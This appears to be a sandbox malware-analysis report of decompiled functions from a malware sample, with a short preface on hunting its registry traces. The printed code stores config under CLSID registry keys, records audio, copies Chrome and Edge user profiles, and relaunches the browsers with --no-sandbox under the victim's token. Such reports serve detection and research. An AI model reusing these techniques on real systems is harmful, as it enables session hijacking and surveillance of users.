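On a live host produce the input with `reg export HKLM\SOFTWARE\Classes\CLSID clsid.reg /reg:64` and read it with `open(path, encoding="utf-16")` (reg.exe writes UTF-16 with a BOM). The `/reg:64` switch matters because the routine requests KEY_WOW64_64KEY, so a 32-bit tool looking at the WOW6432Node view would miss the key. A DWORD named "1" directly under a CLSID subkey is unusual since COM registrations keep a default string plus InProcServer32/LocalServer32 children, but treat hits as leads to verify rather than proof.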

                                                                                    C-Code - Quality: 90%
			// Reads a DWORD value named "1" from HKLM\SOFTWARE\Classes\CLSID\<name>, where <name>
			// is produced by E04EC6010 from the string "SEOID" (the derived name is not shown here).
			E04EC6B30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				char _v616;
				int _v620;
				int _v624;
				signed int _t20;
				signed int _t52;

				_t20 =  *0x4f03008; // 0x3d21fb31 (/GS stack-cookie seed)
				_v8 = _t20 ^ _t52;
				_v616 = 0; // lpData: the DWORD read back
				_v620 = 4; // lpcbData = sizeof(DWORD)
				E04EC6010(__ebx, L"SEOID",  &_v88, __edi, __esi); // derive the subkey name into _v88
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(__edi,  &_v616, 0, _v620); // likely memset(&_v616, 0, 4)
				_v612 = 0; // hKey
				// 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY,
				// i.e. this 32-bit code explicitly asks for the 64-bit registry view
				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
					L3:
					return E04ED572E(_v8 ^ _t52); // stack-cookie check
				} else {
					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620); // value "1"; the type comes back in _v624
					_t51 =  ==  ? 1 : 0; // operands lost by the decompiler; presumably the ERROR_SUCCESS test on the RegQueryValueExW result
					RegCloseKey(_v612);
					_t58 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L3;
					} else {
                                                                                    						return E04ED572E(_v8 ^ _t52);
                                                                                    					}
                                                                                    				}
                                                                                    			}













APIs
  • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
  • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
  • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
• wsprintfW.USER32 ref: 04EC6B75
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EC6BB2
• RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6BDD
• RegCloseKey.ADVAPI32(?), ref: 04EC6BF3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: CloseOpenQueryValue$wsprintf
• String ID: SEOID$SOFTWARE\Classes\CLSID\%s
• API String ID: 3615287298-3437544703
• Opcode ID: f112dfac62d2c7c952dc01020a16bece2d3aef1af27867901166429b56259cac
• Instruction ID: cf448a92a9aaf289ee5a94a819ef4c5ee1f518ed87df19290fd737ab84d91c75
• Opcode Fuzzy Hash: f112dfac62d2c7c952dc01020a16bece2d3aef1af27867901166429b56259cac
• Instruction Fuzzy Hash: CC21107290522CABDB20DBA0DD49FEEB7BCEF44205F5001D9AD0AA6144DA366E84DF90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E04EC4730(WCHAR* __ecx, WCHAR* __edx, void* __esi) {
    signed int _v0;
    signed int _v8;
    struct _SYSTEMTIME _v24;
    struct _SYSTEMTIME _v40;
    struct _FILETIME _v48;
    struct _FILETIME _v56;
    struct _FILETIME _v64;
    signed int _t16;
    WCHAR* _t45;
    signed int _t48;

    _t50 = (_t48 & 0xfffffff8) - 0x3c;
    _t16 =  *0x4f03008; // 0x3d21fb31
    _v8 = _t16 ^ (_t48 & 0xfffffff8) - 0x0000003c;
    _t45 = __edx;
    if(GetFileTime(CreateFileW(__ecx, 0, 1, 0, 3, 0x80, 0),  &_v64,  &_v48,  &_v56) != 0) {
        FileTimeToSystemTime( &_v64,  &_v24);
        SystemTimeToTzSpecificLocalTime(0,  &_v24,  &_v40);
        wsprintfW(_t45, L"%04d-%02d-%02d  %02d:%02d", _v40.wYear & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wDay & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff);
        return E04ED572E(_v0 ^ _t50 + 0x0000001c);
    } else {
        return E04ED572E(_v8 ^ _t50);
    }
}

APIs
• CreateFileW.KERNEL32(-00000220,00000000,00000001,00000000,00000003,00000080,00000000,00000012), ref: 04EC4757
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 04EC476D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 04EC4791
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04EC47A3
• wsprintfW.USER32 ref: 04EC47CD
Strings
• %04d-%02d-%02d %02d:%02d, xrefs: 04EC47C7
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Time$File$System$CreateLocalSpecificwsprintf
• String ID: %04d-%02d-%02d %02d:%02d
• API String ID: 4290651727-1132360693
• Opcode ID: dc6ee063658b5f56cb0aa63756ba953219f0dd9c7312198db5e62f6888a1a373
• Instruction ID: a42df67e3eefc3a2528cdec15f522a5e7db3126308ae046c79702f2b69ef3840
• Opcode Fuzzy Hash: dc6ee063658b5f56cb0aa63756ba953219f0dd9c7312198db5e62f6888a1a373
• Instruction Fuzzy Hash: 28117272104304BED3509B54DC45FBB77DCEB88715F00460DF999D61C0E668E945C766
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E04EB1550(intOrPtr _a4) {
    struct tagMSG _v32;
    intOrPtr _t19;
    signed int _t30;
    intOrPtr _t34;

    if(GetMessageW( &_v32, 0, 0, 0) == 0) {
        L7:
        return 0;
    } else {
        _t34 = _a4;
        do {
            _t19 = _v32.message;
            if(_t19 != 0x3c0) {
                L5:
                if(_t19 == 0x3bf) {
                    goto L7;
                } else {
                    goto L6;
                }
            } else {
                SetEvent( *(_t34 + 0x24));
                WaitForSingleObject( *(_t34 + 0x28), 0xffffffff);
                 *((intOrPtr*)(_t34 + 0x1c)) = 1;
                _t30 = waveInAddBuffer( *(_t34 + 0x18),  *(_t34 + 0x30 + (1 -  *((intOrPtr*)(_t34 + 0x1c))) * 4), 0x20);
                if(_t30 != 0) {
                    return _t30 | 0xffffffff;
                } else {
                    _t19 = _v32.message;
                    goto L5;
                }
            }
            goto L9;
            L6:
            TranslateMessage( &_v32);
            DispatchMessageW( &_v32);
        } while (GetMessageW( &_v32, 0, 0, 0) != 0);
        goto L7;
    }
    L9:
}

APIs
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04EB1569
• SetEvent.KERNEL32(?), ref: 04EB158D
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB1598
• waveInAddBuffer.WINMM(?,?,00000020), ref: 04EB15B2
• TranslateMessage.USER32(?), ref: 04EB15CA
• DispatchMessageW.USER32 ref: 04EB15D0
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04EB15E0
Memory Dump Source
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
Yara matches
Similarity
• API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
• String ID:
• API String ID: 3294988761-0
• Opcode ID: 5b5c4125e17d769400d052014331a647dc8cea0895c88373b16ec9d49ea8f09a
• Instruction ID: 4c52cfab57da92d1a6f6b224a658f9d1c92780b9e60160d3970d6971dde9ccc1
• Opcode Fuzzy Hash: 5b5c4125e17d769400d052014331a647dc8cea0895c88373b16ec9d49ea8f09a
• Instruction Fuzzy Hash: 4A11B232A00309AFDB219EAAEC45FABB7B8EB44761F004625FA51D61D4D725F8018BA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E04EC7C50(void* __ecx, signed char* _a4) {
    void* _t22;
    intOrPtr _t23;
    void* _t28;
    intOrPtr* _t31;
    intOrPtr _t32;

    _t28 = __ecx;
    _t22 = ( *_a4 & 0x000000ff) + 0xffffffe1;
    if(_t22 > 0x5c) {
        L7:
        _t23 =  *((intOrPtr*)(_t28 + 4));
        _t31 =  *((intOrPtr*)(_t23 + 0x20));
         *(_t23 + 0x44) = 1;
        if(_t31 != 0) {
            L10:
            return  *((intOrPtr*)( *_t31 + 4))();
        }
        _t32 =  *((intOrPtr*)(_t23 + 0x24));
        if(_t32 != 0) {
            _t31 = _t32 + 4;
            goto L10;
        }
        return _t23;
    } else {
        switch( *((intOrPtr*)(( *(_t22 + 0x4ec7d30) & 0x000000ff) * 4 +  &M04EC7D18))) {
            case 0:
                __eax = __ebx + 0xec;
                __eax = InterlockedExchange(__ebx + 0xec, 1);
                 *((intOrPtr*)(__ebx + 0xe8)) = 0x3f;
                return __eax;
                goto L12;
            case 1:
                __eax = __ebx + 0xec;
                __eax = InterlockedExchange(__ebx + 0xec, 0);
                 *((intOrPtr*)(__ebx + 0xe8)) = 0x1f;
                return __eax;
                goto L12;
            case 2:
                _push(__edi);
                __edi =  *(__ecx + 5);
                __ebx + 0x10 = InterlockedExchange(__ebx + 0x10,  *(__ecx + 1));
                __eax = __ebx + 0x14;
                __eax = InterlockedExchange(__ebx + 0x14, __edi);
                _pop(__edi);
                return __eax;
                goto L12;
            case 3:
                __eax =  *(__ecx + 1);
                 *(__ebx + 0xf4) = __eax;
                return __eax;
                goto L12;
            case 4:
                return SetEvent( *(__ecx + 0x18));
                goto L12;
            case 5:
                goto L7;
        }
    }
    L12:
}
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?), ref: 04EC7C79
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC7C8F
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC7C9A
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 04EC7CAF
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7CCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$Event
                                                                                    • String ID: ?
                                                                                    • API String ID: 767157976-1684325040
                                                                                    • Opcode ID: 56d22b5b29b99a8d8b405215c872b2d75d0466d892857e5bb988b991bb32ecf7
                                                                                    • Instruction ID: 776a4ae6828e0f70d9c36844606fa8bfd6a46bb70dfe3250e94e31dc841cc8dd
                                                                                    • Opcode Fuzzy Hash: 56d22b5b29b99a8d8b405215c872b2d75d0466d892857e5bb988b991bb32ecf7
                                                                                    • Instruction Fuzzy Hash: A5216D72104105DFDB04CF51E988FA6BBA8EB99319F1485ABFE0A8F246C737D451DB20
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EEBE46(intOrPtr _a4) {
                                                                                    				void* _t18;
                                                                                    				intOrPtr _t45;
                                                                                    
                                                                                    				_t45 = _a4;
                                                                                    				if(_t45 != 0) {
                                                                                    					E04EEBE0A(_t45, 7);
                                                                                    					_t2 = _t45 + 0x1c; // 0x1d
                                                                                    					E04EEBE0A(_t2, 7);
                                                                                    					_t3 = _t45 + 0x38; // 0x39
                                                                                    					E04EEBE0A(_t3, 0xc);
                                                                                    					_t4 = _t45 + 0x68; // 0x69
                                                                                    					E04EEBE0A(_t4, 0xc);
                                                                                    					_t5 = _t45 + 0x98; // 0x99
                                                                                    					E04EEBE0A(_t5, 2);
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                    					_t9 = _t45 + 0xb4; // 0xb5
                                                                                    					E04EEBE0A(_t9, 7);
                                                                                    					_t10 = _t45 + 0xd0; // 0xd1
                                                                                    					E04EEBE0A(_t10, 7);
                                                                                    					_t11 = _t45 + 0xec; // 0xed
                                                                                    					E04EEBE0A(_t11, 0xc);
                                                                                    					_t12 = _t45 + 0x11c; // 0x11d
                                                                                    					E04EEBE0A(_t12, 0xc);
                                                                                    					_t13 = _t45 + 0x14c; // 0x14d
                                                                                    					E04EEBE0A(_t13, 2);
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0x154)));
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0x158)));
                                                                                    					E04EE8159( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                    					return E04EE8159( *((intOrPtr*)(_t45 + 0x160)));
                                                                                    				}
                                                                                    				return _t18;
                                                                                    			}





                                                                                    APIs
                                                                                      • Part of subcall function 04EEBE0A: _free.LIBCMT ref: 04EEBE33
                                                                                    • _free.LIBCMT ref: 04EEBE94
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEBE9F
                                                                                    • _free.LIBCMT ref: 04EEBEAA
                                                                                    • _free.LIBCMT ref: 04EEBEFE
                                                                                    • _free.LIBCMT ref: 04EEBF09
                                                                                    • _free.LIBCMT ref: 04EEBF14
                                                                                    • _free.LIBCMT ref: 04EEBF1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 76209f5d8c7b1e7ff31482e428a2cdb4c291a6582c172a885daab1959a0a5aa6
                                                                                    • Instruction ID: ad0aa9724265031930d7411cec6fba80fda83e6d0e59f091372737574fa9d64a
                                                                                    • Opcode Fuzzy Hash: 76209f5d8c7b1e7ff31482e428a2cdb4c291a6582c172a885daab1959a0a5aa6
                                                                                    • Instruction Fuzzy Hash: BB112E72D40B0CAEE620FBB2CC45FEB779CAF04704F406D15A79ABA1A0DA75B50487E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EBA080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				signed int _t14;
                                                                                    				intOrPtr* _t16;
                                                                                    				int _t26;
                                                                                    				intOrPtr _t32;
                                                                                    				void* _t37;
                                                                                    				int _t41;
                                                                                    				char* _t43;
                                                                                    				signed int _t44;
                                                                                    
                                                                                    				_t14 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t14 ^ _t44;
                                                                                    				_t43 = __ecx;
                                                                                    				_t16 = __ecx;
                                                                                    				_t37 = __ecx + 2;
                                                                                    				do {
                                                                                    					_t32 =  *_t16;
                                                                                    					_t16 = _t16 + 2;
                                                                                    				} while (_t32 != 0);
                                                                                    				_t41 = 2 + (_t16 - _t37 >> 1) * 2;
                                                                                    				E04EC5490(__ecx, _t41);
                                                                                    				E04EC6010(__ebx, L"Global",  &_v88, _t41, __ecx);
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_v612 = 0;
                                                                                    				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                    				if(_t26 == 0) {
                                                                                    					RegSetValueExW(_v612, "3", _t26, 3, _t43, _t41);
                                                                                    					RegCloseKey(_v612);
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t44);
                                                                                    			}















                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EBA0DC
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04EBA111
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD120,00000000,00000003), ref: 04EBA12B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA137
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValuewsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 4211343355-1865207932
                                                                                    • Opcode ID: fd4202cee0fd781a7212d1d1b1f467f423c3ad3b425515dc45a7cc432a0ed332
                                                                                    • Instruction ID: b00ed5fe8f19c7b3b1910dcb82f42908a1276e27a69f7b9c6f2376762dd83402
                                                                                    • Opcode Fuzzy Hash: fd4202cee0fd781a7212d1d1b1f467f423c3ad3b425515dc45a7cc432a0ed332
                                                                                    • Instruction Fuzzy Hash: 15116031600218BBEB209F94EC4AFAEB7BCEB84705F104195FE0AE7184DB756E04DB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EBA150(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				signed int _t14;
                                                                                    				char* _t20;
                                                                                    				int _t26;
                                                                                    				char _t33;
                                                                                    				char* _t38;
                                                                                    				int _t41;
                                                                                    				char* _t43;
                                                                                    				signed int _t44;
                                                                                    
                                                                                    				_t14 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t14 ^ _t44;
                                                                                    				_t43 = __ecx;
                                                                                    				E04EC6010(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_t20 = _t43;
                                                                                    				_t38 =  &(_t20[2]);
                                                                                    				do {
                                                                                    					_t33 =  *_t20;
                                                                                    					_t20 =  &(_t20[2]);
                                                                                    				} while (_t33 != 0);
                                                                                    				_t41 = 2 + (_t20 - _t38 >> 1) * 2;
                                                                                    				E04EC5490(_t43, _t41);
                                                                                    				_v612 = 0;
                                                                                    				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                    				if(_t26 == 0) {
                                                                                    					RegSetValueExW(_v612, "2", _t26, 3, _t43, _t41);
                                                                                    					RegCloseKey(_v612);
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t44);
                                                                                    			}















                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA184
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EBA1DD
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000003), ref: 04EBA1F7
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA203
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1865207932
                                                                                    • Opcode ID: 14d47ba13d02af0db5b94a3c004936483b77b2a8aa0a5b76ecdbae557a88f1c1
                                                                                    • Instruction ID: 7d5de9f921037ef46ef4bc54ea20e1c9b1f4c3d61727044eafef904ef2bc2b12
                                                                                    • Opcode Fuzzy Hash: 14d47ba13d02af0db5b94a3c004936483b77b2a8aa0a5b76ecdbae557a88f1c1
                                                                                    • Instruction Fuzzy Hash: 3D116031A00218BBEB20DB95DC4AFAE7779EB84705F104195AE06E7184EAB56E04DB90
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB6870(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v12;
                                                                                    				short _v536;
                                                                                    				short _v1056;
                                                                                    				char _v1060;
                                                                                    				char _v1076;
                                                                                    				signed int _t18;
                                                                                    				void* _t20;
                                                                                    				void* _t48;
                                                                                    				signed int _t50;
                                                                                    
                                                                                    				_t18 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t18 ^ _t50;
                                                                                    				_t48 = __ecx;
                                                                                    				_v1060 = 0x104;
                                                                                    				_t20 = E04EC7200( &_v536,  &_v1060, __eflags);
                                                                                    				_t56 = _t20;
                                                                                    				if(_t20 == 0) {
                                                                                    					__eflags = _v12 ^ _t50;
                                                                                    					return E04ED572E(_v12 ^ _t50);
                                                                                    				} else {
                                                                                    					lstrcatW( &_v536, L"\\AppData\\Local\\Google\\Chrome\\User Data");
                                                                                    					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                                                    					E04EC7390(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                                                    					wsprintfW( &_v536, L"cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					asm("movups [ebp-0x430], xmm0");
                                                                                    					_push( &_v1076);
                                                                                    					_push( &_v536);
                                                                                    					E04EC72A0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                                                    					return E04ED572E(_v12 ^ _t50,  &_v536);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Local\Google\Chrome\User Data), ref: 04EB68B5
                                                                                    • wsprintfW.USER32 ref: 04EB68D1
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                      • Part of subcall function 04EC7390: CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                      • Part of subcall function 04EC7390: GetLastError.KERNEL32 ref: 04EC7401
                                                                                      • Part of subcall function 04EC7390: FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • wsprintfW.USER32 ref: 04EB68FB
                                                                                      • Part of subcall function 04EC72A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                      • Part of subcall function 04EC72A0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                      • Part of subcall function 04EC72A0: CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                      • Part of subcall function 04EC72A0: CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                      • Part of subcall function 04EC72A0: DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    • \AppData\Local\Google\Chrome\User Data, xrefs: 04EB68A9
                                                                                    • %s%s, xrefs: 04EB68CB
                                                                                    • cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04EB68F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Createlstrcpy$AddressBlockDirectoryEnvironmentLibraryLoadProcUserlstrcmpwsprintf$CloseDestroyErrorFileFindFirstHandleLastProcessProfile
                                                                                    • String ID: %s%s$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                    • API String ID: 354288507-1696747008
                                                                                    • Opcode ID: 937e6c7fd26231149c4ffe24525015f9217defe955e244b9d2eeb15d009cf430
                                                                                    • Instruction ID: 04d699aa2c73d075a7600813da649d90d560bf64861eb1ddcec9b9e96cc29838
                                                                                    • Opcode Fuzzy Hash: 937e6c7fd26231149c4ffe24525015f9217defe955e244b9d2eeb15d009cf430
                                                                                    • Instruction Fuzzy Hash: F72196B1E4010EA7CB24EF64DD449DEB3BCFF54304F4051E6A90993040EB30AA99CFA5
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB6950(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v12;
                                                                                    				short _v536;
                                                                                    				short _v1056;
                                                                                    				char _v1060;
                                                                                    				char _v1076;
                                                                                    				signed int _t18;
                                                                                    				void* _t20;
                                                                                    				void* _t48;
                                                                                    				signed int _t50;
                                                                                    
                                                                                    				_t18 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t18 ^ _t50;
                                                                                    				_t48 = __ecx;
                                                                                    				_v1060 = 0x104;
                                                                                    				_t20 = E04EC7200( &_v536,  &_v1060, __eflags);
                                                                                    				_t56 = _t20;
                                                                                    				if(_t20 == 0) {
                                                                                    					__eflags = _v12 ^ _t50;
                                                                                    					return E04ED572E(_v12 ^ _t50);
                                                                                    				} else {
                                                                                    					lstrcatW( &_v536, L"\\AppData\\Local\\Microsoft\\Edge\\User Data");
                                                                                    					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                                                    					E04EC7390(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                                                    					wsprintfW( &_v536, L"cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					asm("movups [ebp-0x430], xmm0");
                                                                                    					_push( &_v1076);
                                                                                    					_push( &_v536);
                                                                                    					E04EC72A0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                                                    					return E04ED572E(_v12 ^ _t50,  &_v536);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Local\Microsoft\Edge\User Data), ref: 04EB6995
                                                                                    • wsprintfW.USER32 ref: 04EB69B1
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                      • Part of subcall function 04EC7390: CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                      • Part of subcall function 04EC7390: GetLastError.KERNEL32 ref: 04EC7401
